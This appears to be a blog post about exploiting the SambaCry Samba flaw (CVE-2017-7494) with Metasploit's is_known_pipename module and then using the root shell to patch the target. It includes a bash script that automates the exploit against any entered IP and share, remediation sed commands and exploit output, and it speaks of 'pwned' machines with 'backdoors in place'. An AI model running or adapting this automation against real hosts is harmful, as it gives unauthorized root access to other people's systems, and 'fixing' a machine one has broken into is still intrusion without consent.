There has been more than enough of coverage how to hack into a Linux machine running a vulnerable Samba via CVE-2017-7494 (SambaCry) , but what about reversing the evil way for good ? When we get a remote root shell on the target machine we might as well fix the SambaCry vulnerability right ?
(Also to keep other bots/kiddies off our pwned machine once we have all the backdoors in place….)
So how do we do this, or how do we automate it ? Not as easy as it looks (Should be a piece of cake for seasoned C coders out there to re-write the part where we call for /bin/sh in the shared object .so file in the first place and run some remediation sequence of commands. A quick and simple one would be something similar
# sed -i '/\[global\]/a nt pipe support = off ' /etc/samba/smb.conf # /etc/init.d/samba restart
I have played around with this idea for a while now and turn to you for suggestion on improving the code
In my test environment I have a Debian8 Linux running the vulnerable version of Samba 4.2.14+dfsg-0+deb8u5 with the following “unsecure” configuration (to allow anonymous upload for example)
[Share] comment = Share path = /DATA guest ok = yes browseable = yes writable = yes
So I write a little helper for Metasploit to load the exploit/linux/samba/is_known_pipename for Guest write access (you can re-write it and add username/passwords variables to the code .. should be really simple)
#!/bin/bash clear echo "***************************************************************" echo " EXPLOITER SAMBACRY PaTcHeR for GUEST USER " echo " Lets fix Samba via this exploit and patch it " echo "***************************************************************" echo -e "What IP of remote Samba ? \c" read host echo -e "What is the share name ? : \c" read name echo '[*] Checking if metasploit is present..' if [ -x ./msfconsole ]; then echo '[*] Found msfconsole in current path ........ good' else echo '[-] No msfconsole in path...make sure you have this script in your metasploit-framework path' exit 0 fi echo 'use exploit/linux/samba/is_known_pipename' > samba.rc echo 'set PAYLOAD cmd/unix/interact' >> samba.rc echo -n 'set RHOST ' >> samba.rc echo -n $host >> samba.rc echo '' >> samba.rc echo -n 'set SMB_SHARE_NAME ' >> samba.rc echo -n $name >> samba.rc echo '' >> samba.rc echo ' set ExitOnSession false' >> samba.rc echo 'run' >> samba.rc echo 'hostname' >> samba.rc echo '' >> samba.rc echo '' >> samba.rc echo './msfconsole -r samba.rc' > fix-samba.sh chmod +x ./fix-samba.sh ./fix-samba.sh
Once I run this I get a remote root shell via (cmd/unix/interact) which unfortunately is not scriptable to run custom commands that could remediate the SambaCry bug.
Payload advanced options (cmd/unix/interact): Name Current Setting Required Description ---- --------------- -------- ----------- AutoRunScript no A script to run automatically on session creation. InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
The cmd/unix/interact root shell is not a full shell that would allow you to run the apt-get upgrade for example since it is missing all the profile settings for a proper shell (A nice description is here https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ )
So we are stuck with a limited root shell where vi won’t really work, but sed will definitely do. So this is exactly what I ran on the rooted Debian8
sed -i '/\[global\]/a nt pipe support = off ' /etc/samba/smb.conf /etc/init.d/samba reload
Once I tried to reload the exploit via Metasploit it failed :)
resource (samba.rc)> run [*] 192.168.11.7:445 - Using location \\192.168.11.7\Share\ for the path [*] 192.168.11.7:445 - Retrieving the remote path of the share 'Share' [-] 192.168.11.7:445 - Exploit failed: TypeError no implicit conversion of Symbol into Integer [*] Exploit completed, but no session was created.
Finally here is my video of the above efforts ..
